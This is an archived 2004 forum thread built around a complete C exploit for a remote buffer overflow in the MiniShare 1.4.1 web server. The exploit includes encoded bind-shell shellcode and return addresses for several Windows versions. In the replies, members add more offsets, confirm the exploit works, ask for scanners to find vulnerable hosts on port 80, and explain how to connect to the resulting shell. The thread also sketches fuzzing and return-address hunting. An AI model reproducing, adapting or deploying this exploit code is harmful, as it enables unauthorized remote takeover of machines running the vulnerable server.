Vendors are contacted 2 hours now before you.Some security sites so. Enjoy members with my discovery  and again check my website if needed. CODE
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS MINISHARE
------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who has the need to share files to anyone,
doesn't have a place to store the files on the web,
and does not want or simply does not have the skill
and possibility to set up and maintain a complete HTTP-server software...
--------------
VULNERABILITY
--------------
A simple buffer overflow in the link length, nothing more
read the code for further instructions.
----
FIX
----
Actually none, the vendor is contacted the same day published, 1 hour before you.
As a nice (filtered) to NGSS , iDEFENSE and all others private disclosures
homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
lol :->
----
EXTRA
----
Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
/*
//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English
char scode+[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xE8\x75\x6E\xFF\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xEB\x10\x6F\xFF\x77\x58\x68\x61\x63\x6B\x90";
//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English
char scode+[]=
& #34;LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0T
kdfhH"
& #34;CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tky
CjyY0"
& #34;Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0
Lkz0T"
& #34;kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjO
X0Dkz"
& #34;0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1Tkz
CCCfh"
& #34;hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3t
LHCiS"
& #34;r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgS
wzG";
*/
static char payload[5000];
char espxp1en[]="\x33\x55\xdc\x77"; //JMP ESP - user32.dll - WinXP SP1 English
char esp2k4en[]="\xb8\x9e\xe3\x77"; //JMP ESP - user32.dll - Win2k SP4 English
char espnt6en[]="\xf8\x29\xf3\x77"; //JMP ESP - kernel32.dll - WinNT SP6 English
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>3)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=80;
if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
cout<<"[+] target: "<<os<<endl;
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, constructing the payload..."<<endl;
Sleep(1000);
sizeA=1787;
sizeB=414-sizeof(scode);
sizeC=10;
sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
memset(payload,0,sizeof(payload));
strcat(payload,"GET ");
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,target);
for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
strcat(payload,scode);
for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
strcat(payload," HTTP/1.1\r\n\r\n");
Sleep(1000);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
Sleep(1000);
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
cout<<"TARGETS: "<<endl;
cout<<" [+] 1. WinXP SP1 English (*)"<<endl;
cout<<" [+] 2. Win2k SP4 English (*)"<<endl;
cout<<" [+] 3. WinNT SP6 English (*)"<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 80 is default if no port specified"<<endl;
cout<<" The exploit bind a shellcode to the port 101"<<endl;
cout<<" A wildcard (*) mean Tested."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ===================================================[v0.1]===="<<endl;
cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl;
cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<" ============================================================="<<endl;
cout<<" "<<endl;
}
bye
Anarchiste
Nov 7 2004, 02:34 PM
Je n'ai qu'une chose à dire, chapeau l'artiste! Franchement respect pour ton boulot, peu de gens apportent autant sur la board, et je ne dis pas ça pour te lécher le cul, je dis ça parce que justement on manque de personnes actives comme toi...sur ce bonne continuation, et promis je ne le "recoderais" pas celui là 
QUOTE(Anarchiste @ Nov 7 2004, 02:34 PM) Je n'ai qu'une chose à dire, chapeau l'artiste! Franchement respect pour ton boulot, peu de gens apportent autant sur la board, et je ne dis pas ça pour te lécher le cul, je dis ça parce que justement on manque de personnes actives comme toi...sur ce bonne continuation, et promis je ne le "recoderais" pas celui là you can of course recode it I dont care but dont say coded by you without to mention the original coder as the other day, or just say at least that you modded it ,etc, this is not needed to say more than you did or at least if you really wants to say coded by you , erase all in the code , grab your debugger and code your own.
michael
Nov 7 2004, 02:41 PM
QUOTE payload send, connect the port 101 to get a shell how or with what should i connect to port 101 good job on the coding m8
cyrixx
Nov 7 2004, 02:57 PM
tzzzz, try nc guy
[eXPhase
Nov 7 2004, 03:49 PM
Nice exploit again. Works here on WinXP EN SP1.
Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it.
Nikscap
Nov 7 2004, 03:59 PM
Thx for your work man , I am going to : http://dfind.kd-team.com/36/55/op.phpbye
tuttefrut
Nov 7 2004, 04:28 PM
very nice work 101
will test it right away
Killahbee
Nov 7 2004, 04:58 PM
QUOTE([eXPhase @ Nov 7 2004, 03:49 PM) Nice exploit again. Works here on WinXP EN SP1. Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it. maybe a banner scan will help you 
brOmstar
Nov 7 2004, 05:04 PM
thx 101 nice code
here is the jmp esp for xp sp2 german
char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German
i will add other german offsets soon when i'm back on my workstation...have fun
QUOTE(brOmstar @ Nov 7 2004, 05:04 PM) thx 101 nice code here is the jmp esp for xp sp2 german char espxp2de[]="\x0a\xaf\xd5\x77"; //JMP ESP - user32.dll - WinXP SP2 German i will add other german offsets soon when i'm back on my workstation...have fun thanx you , ill update my code so with your helps guys.
mortello
Nov 7 2004, 06:39 PM
Crashes Mini on my XP SP1 French....
If you could tell me how to give you the jmp esp....I would
[eXPhase
Nov 7 2004, 07:01 PM
QUOTE(Killahbee @ Nov 7 2004, 04:58 PM) QUOTE([eXPhase @ Nov 7 2004, 03:49 PM) Nice exploit again. Works here on WinXP EN SP1. Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it. maybe a banner scan will help you I couldn't find any Shixxnote a few weeks back also, and that was on port 2000. But you get tons of results on 80. And I know the banner but it is so much work for that single shell I want to see. Nah, I believe 101 it works on other versions to
mortello
Nov 7 2004, 07:16 PM
QUOTE([eXPhase @ Nov 7 2004, 07:01 PM) QUOTE(Killahbee @ Nov 7 2004, 04:58 PM) QUOTE([eXPhase @ Nov 7 2004, 03:49 PM) Nice exploit again. Works here on WinXP EN SP1. Don't gonna try this one on other boxes, since default port is 80 you have to scan ages before you can test it. maybe a banner scan will help you I couldn't find any Shixxnote a few weeks back also, and that was on port 2000. But you get tons of results on 80. And I know the banner but it is so much work for that single shell I want to see. Nah, I believe 101 it works on other versions to I checked the banner....and it doesn't help you since it is this : Microsoft Windows XP [version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\*********>sl.exe -bht 888 192.168.1.101 ScanLine ™ 1.01 Copyright © Foundstone, Inc. 2002 http://www.foundstone.comScan of 1 IP started at Sun Nov 07 14:14:57 2004 ------------------------------------------------------------------------------- 192.168.1.101 Responded in 0 ms. 0 hops away Responds with ICMP unreachable: No TCP ports: 888 ------------------------------------------------------------------------------- Scan finished at Sun Nov 07 14:15:01 2004 1 IP and 1 port scanned in 0 hours 0 mins 4.00 secs BTW, I made it run on port 888 so that's why its that port that I scanned with sl.exe
Paul
Nov 7 2004, 07:30 PM
CODE D:\>d:\forum\sl\sl -bhpt 80 localhost
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
Scan of 1 IP started at Sun Nov 07 20:27:42 2004
-------------------------------------------------------------------------------
127.0.0.1
Responds with ICMP unreachable: No
TCP ports: 80
TCP 80:
[HTTP/1.1 200 OK Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML
4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>]
-------------------------------------------------------------------------------
Scan finished at Sun Nov 07 20:27:42 2004
1 IP and 1 port scanned in 0 hours 0 mins 0.04 secs Thanx to share it with us 101.
the banner you can prolly get it if you send a string no?
try to send stuff like HEAD / HTTP/1.1 , HEAD / , etc , you will notice maybe.
ShouiZen
Nov 7 2004, 11:22 PM
Man , you do a excellent job!!
TO be continued...
slb33
Nov 8 2004, 06:33 AM
Crashed on my Windows Xp sp1!
Guess I need to play around with the sleep in this exploit.
I'll let you know if I figure it out
Error-404
Nov 8 2004, 01:58 PM
nice work m8
but 1 question.which port must i scan?
Error-404
B3T4
Nov 8 2004, 03:01 PM
when i do "findjump user32.dll esp" i get a whole list of jmps and calls, which one do i need to use or is it a trial and error ? QUOTE(Error-404 @ Nov 8 2004, 01:58 PM) nice work m8 but 1 question.which port must i scan? Error-404 deffently NOT the HTTP-port 
z0mbi3
Nov 8 2004, 04:35 PM
something u can add to it Winxp sp2 english CODE
char espxp2en[]="\x40\x27\xdf\x77"; //0x77DF2740 -advapi32.dll jmp esp
tried it works great see ya
brOmstar
Nov 8 2004, 05:13 PM
@beta any jmp esp should do it
Error-404
Nov 8 2004, 05:51 PM
thx for info have someone hacked a server with this exploit?
brOmstar
Nov 8 2004, 05:54 PM
no we rn't hackers ...we only like to research 
GamezDoG
Nov 8 2004, 06:33 PM
Thnx for sharing this exploit mate!!
Does somebody know a good banner scanner for this exploit?? Because there a lot ports 80 open!!
Thnx
da_cash
Nov 8 2004, 08:29 PM
tested to work on WinXP SP2 Polish char espxp2pl[]="\x6e\xe2\xd4\x77"; //JMP ESP - user32.dll - WinXP SP2 Polish thx goes 4 DiabloHorn 4 posting great tool called findjump 
so if someone know the method to get the universal jmp , if there is one , thx to tell me how to find it. thax
brOmstar
Nov 8 2004, 10:17 PM
what exactly is an universal jmp call ...does it mean that this jmp esp is the same on every system in the same dll @the same address??
yes bromstar, an universal jmp adress will work on every windows, as many previous exploits, take the rpc1 for example, when HDMoore rlsed It , you can search on packetstormsecurity for my modded exploit , I have added a lot of offsets but about 1 week later it was useless because the universal offset was found.
I havent papers on how to find this , I dont care if there is an magic offset here to find for minishare but anyway Id like to learn this method , if some1 know somethign about this or have a good pâper about, thanx to post it.
brOmstar
Nov 8 2004, 10:41 PM
I know universal opcodes but not if it is in the kind I described(cause then a tool must check every osversion/lang/sp to detect that..i think-should be impossible). I read something about msfpescan at metasploit.org. taken from http://www.metasploit.org/confs/blackhat2004/defcon.pdf-------------------------------------------------------- Msfpescan - Return Address Fun Scans PE images for data (DLL, EXE) Finds universal return addressesEasy to script, easy to parse output Regular expression match support Can automatically disassemble code msfpescan found good returns DCOM - NT SP6 -> XP SP1 Serv-U - All versions NT->2K3 LSASS - Autodetect Universal Blackice - Mad Bruteforce Foo ----------------------------------------------------------- so that should be a way to detect universal offsets. some more info about taken from http://www.securityfocus.com/infocus/1800---------------------------------------------------------------- 3.1 Utilities The new utilities are really just the icing on the cake, and their importance is only full evident once the tools are utilized. Msfpescan can be used to analyze and disassemble executables and DLLs, which helps to find the correct offsets and addresses during the stage of exploitation and privilege escalation. It can search for jmp statements or for a sequence like pop-pop-ret, and the utility even supports regular expressions. This can be used to find effective return addresses from Windows expressions, and thus can be used to add new targets to the exploit. The various command line flags are as shown below, Usage: /home/framework-2.2/msfpescan <input> <mode> <options> Inputs: -f <file> Read in PE file -d <dir> Process memdump output Modes: -j <reg> Search for jump equivalent instructions -s Search for pop+pop+ret combinations -x <regex> Search for regex match -a <address> Show code at specified virtual address Options: -A <count> Number of bytes to show after match -B <count> Number of bytes to show before match -I address Specify an alternate ImageBase -n Print disassembly of matched data --------------------------------------------------------------------------------------- but i don't understood how to find the universal offset with that tool(at the moment). Could it be that the jmp is in a dll that is loaded and shipped with the exploited software and is the same for every os/lang/ver ??
thanx man i will read this.
Deadhat
Nov 9 2004, 11:40 AM
where do i get findjump?
ConfigSys
Nov 9 2004, 12:33 PM
tested&worked on WinxXp-SP1(english)
professional work 101
simple hint
because expoit work with port 80
it means we can explorer victim ip
and then we can see if we got MiniShare server.
ZoraX
Nov 9 2004, 01:28 PM
nice sploit:D Just tested localy and worked 100% keep the good work up:)
alzeimeur
Nov 9 2004, 01:53 PM
nice Xploit , tested locally work perfect but I have a question, is there a scanner for this Xploit ? thx al'
thanx all for the nice answers, I found another hole in a small ftp server, check my website , Im rlsing it soon , time to advise the coder of it atm l8r
GamezDoG
Nov 9 2004, 04:11 PM
Is there some Scanner for this exploit?? Because there are a lot of ports 80??
paskaluis
Nov 9 2004, 07:36 PM
101, thx for the code, what for a prog i need to use for debugg (jump addy) to add diffrent offsets.?
da_cash
Nov 9 2004, 08:43 PM
for all people interested here's the tool used for finding offsets in your versions..
ps ..class101 could you create any tutorial about win buffer overflows / how do you find them and what tools did You use ... it may help us gaining some more knowledge
I debug a small app and simply send various strings to it , and boom ! I dont use codes to find them . just using many time ...
mortello
Nov 10 2004, 02:36 AM
QUOTE(101 @ Nov 9 2004, 10:47 PM) I debug a small app and simply send various strings to it , and boom ! I dont use codes to find them . just using many time ... care to explain how you "debug" a ftp server/web server or else...maybe that could help us (members here) to find some bugs also....
brOmstar
Nov 10 2004, 10:10 AM
run it in a debugger and simple send arguments...
agathos
Nov 11 2004, 03:04 PM
yea a good debugger is WinDBG running like gdb under linux or OllyDBG or softice
ShouiZen
Nov 11 2004, 07:29 PM
char espxp2fr[]="\x0A\xAF\xD5\x77"; //0x77D5AF0A -user32.dll jmp esp WIN XP SP2 french;
It works fine( I tested)
101 you would do a tutorial for all members governmentsecurity
thanks
DHS`
Nov 11 2004, 09:56 PM
idd @ only port 80, & banner doesn't help
DiabloPatch
Nov 12 2004, 01:23 AM
well nice those exploits but would also be nice to tell them how you learn such things. Knowledge should be for every one. So just a very tiny quick intro to this. (since there are numorous posts on this board covering this subject.) Finding exploits is also referred to as fuzzing. Which mean sending random length strings to a port where a service runs to see if it crashes or something odd happens. this is the easy definition to find the normal overflows. There are more powerfull fuzzing techniques to find other kind of exploits. After finding a "exploit" in this stage rather called a bug. Now you fire up your debugger(softice or ollydbg) and start to mess around with it. The most easy explanation would be try to get "control of eip" meaning that you know exactly how many bytes to send before you start overwriting the value of eip. at the stage where you control eip all you need to do is find out where your "payload" is and how to get there. So just finding a opcode to overwrite eip with it so that eip points to your "payload" then you manually created a working exploit. Then after some testing etc you can just make a little C/perl program to do it all autmatically. This was very short a little explanation on how it's done in a very basic way. for more references here are some papers. - Very Nice challanges http://community.core-sdi.com/~gera/InsecureProgramming/ - Alphannumeric Shellcode http://www.phrack.org/show.php?p=57&a=15 - Smashing the stack for fun and profit http://www.insecure.org/stf/smashstack.txt - EliteHaven Nice site with shellcode and information http://www.elitehaven.net/index2.htm - MetaSploit for shellcodes and engines http://www.metasploit.com/shellcode.html - Very Nice Bof for beginners http://www.infosecwriters.com/texts.php?op=display&id=134 - Non-Technical talk about Shellcode Generation http://www.coresecurity.com/files/files/51...eGeneration.pdf - Understanding Windows Shellcode http://www.hick.org/code/skape/papers/win32-shellcode.pdf - Very nice collection of papers http://www.subterrain.net/overflow-papers/- Site with basic but nice explanation of shellcodes and bo's http://www.delikon.de- shitload of explanation about several exploitation techniques. http://community.corest.com/~juliano/
101
Nov 12 2004, 01:59 PM
QUOTE(DiabloPatch @ Nov 12 2004, 01:23 AM) well nice those exploits but would also be nice to tell them how you learn such things. Knowledge should be for every one.
DiabloHorn, there is no need to explain what is already perfeclty explained in tons of public papers .... I think until now I spreaded enough clear codes to be understanded .... The guys telling me to write something are just lazy themself to start to learn c, asm and exploit coding. What im not doing as the papers is the fuzzing technic wich I do manually as I already said, because im sure to find more holes via that way than to use a tool to detect them. thats all . bye
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
